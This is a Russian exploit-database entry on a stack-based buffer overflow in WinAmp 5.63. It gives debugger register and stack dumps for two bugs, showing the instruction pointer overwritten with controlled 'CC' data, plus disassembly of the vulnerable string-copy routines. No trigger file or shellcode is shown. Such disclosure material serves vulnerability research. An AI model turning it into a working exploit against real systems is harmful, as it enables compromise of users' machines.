WinAmp 5.63 - Stack-based Buffer Overflow Exploit

Свойства

Дата публикации:
03.07.2013
Цель:
WinAmp 5.63
Тип воздействия:
Компрометация системы

Код

Registers:
EAX 3B3C08EB
ECX 7C80BAFC kernel32.7C80BAFC
EDX 00430010 winamp.00430010
EBX 0000007E
ESP 00C1F290 UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 001961E8
EDI 0000060B
EIP 00430060 winamp.00430060
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty +NaN
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20   > 00430043  CC  winamp.00430043
ESP-1C   > 0043004B  KC  winamp.0043004B
ESP-18   > 7C80BAFC      kernel32.7C80BAFC
ESP-14   > 00430043  CC  winamp.00430043
ESP-10   > 00430043  CC  winamp.00430043
ESP-C    > 00430043  CC  winamp.00430043
ESP-8    > 00430043  CC  winamp.00430043
ESP-4    > 00430043  CC  winamp.00430043
ESP ==>  > 00430043  CC  winamp.00430043
ESP+4    > 00430043  CC  winamp.00430043
ESP+8    > 00430043  CC  winamp.00430043
ESP+C    > 00430043  CC  winamp.00430043
ESP+10   > 00430043  CC  winamp.00430043
ESP+14   > 00430043  CC  winamp.00430043
ESP+18   > 00430043  CC  winamp.00430043
ESP+1C   > 00430043  CC  winamp.00430043
ESP+20   > 00430043  CC  winamp.00430043

Vulnerable code part:
.text:1001A5B8                 push    eax             ; lpString2
.text:1001A5B9                 lea     eax, [ebp+String1]
.text:1001A5BF                 push    eax             ; lpString1
.text:1001A5C0                 call    ds:lstrcpynW
.text:1001A5C6                 cmp     word ptr [ebp+wParam], si
.text:1001A5CD                 jnz     short loc_1001A5E2
.text:1001A5CF                 mov     dword_100310B4, 1
.text:1001A5D9                 cmp     [ebp+String1], si
.text:1001A5E0                 jz      short loc_1001A5E8
.text:1001A5E2
.text:1001A5E2 loc_1001A5E2:                           ; CODE XREF:
sub_1001A551+7Cj
.text:1001A5E2                 mov     dword_100310B4, esi
.text:1001A5E8
.text:1001A5E8 loc_1001A5E8:                           ; CODE XREF:
sub_1001A551+8Fj
.text:1001A5E8                 pop     esi
.text:1001A5E9                 leave
.text:1001A5EA                 retn
.text:1001A5EA sub_1001A551    endp


5. PROOF-OF-CONCEPT (DEBUG) (Bug #2)
------------------------------------
Registers:
EAX 00000000
ECX 079A9D68 ml_local.079A9D68
EDX 00380608
EBX 00000000
ESP 00C1E46C UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 00000000
EDI 00000000
EIP 00430043 winamp.00430043
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20   > 00430043  CC  winamp.00430043
ESP-1C   > 00430043  CC  winamp.00430043
ESP-18   > 00430043  CC  winamp.00430043
ESP-14   > 00430043  CC  winamp.00430043
ESP-10   > 00430043  CC  winamp.00430043
ESP-C    > 00430043  CC  winamp.00430043
ESP-8    > 00430043  CC  winamp.00430043
ESP-4    > 00430043  CC  winamp.00430043
ESP ==>  > 00430043  CC  winamp.00430043
ESP+4    > 00430043  CC  winamp.00430043
ESP+8    > 00430043  CC  winamp.00430043
ESP+C    > 00430043  CC  winamp.00430043
ESP+10   > 00430043  CC  winamp.00430043
ESP+14   > 00430043  CC  winamp.00430043
ESP+18   > 00430043  CC  winamp.00430043
ESP+1C   > 00430043  CC  winamp.00430043
ESP+20   > 00430043  CC  winamp.00430043

Vulnerable code part:
.text:07990871                 lea     eax, [ebp+WideCharStr]
.text:07990877                 push    eax             ; lpString
.text:07990878                 push    3EEh            ; nIDDlgItem
.text:0799087D                 push    [ebp+hDlg]      ; hDlg
.text:07990880                 call    ds:GetDlgItemTextW
.text:07990886                 lea     eax, [ebp+WideCharStr]
[...]
.text:0799097C                 mov     dword_79A9D68, eax
.text:07990981                 mov     dword_79A9D70, eax
.text:07990986                 mov     dword_79A9D6C, eax
.text:0799098B                 mov     dword_79ACB54, eax
.text:07990990                 pop     ebx
.text:07990991                 leave
.text:07990992                 retn

или введите имя

CAPTCHA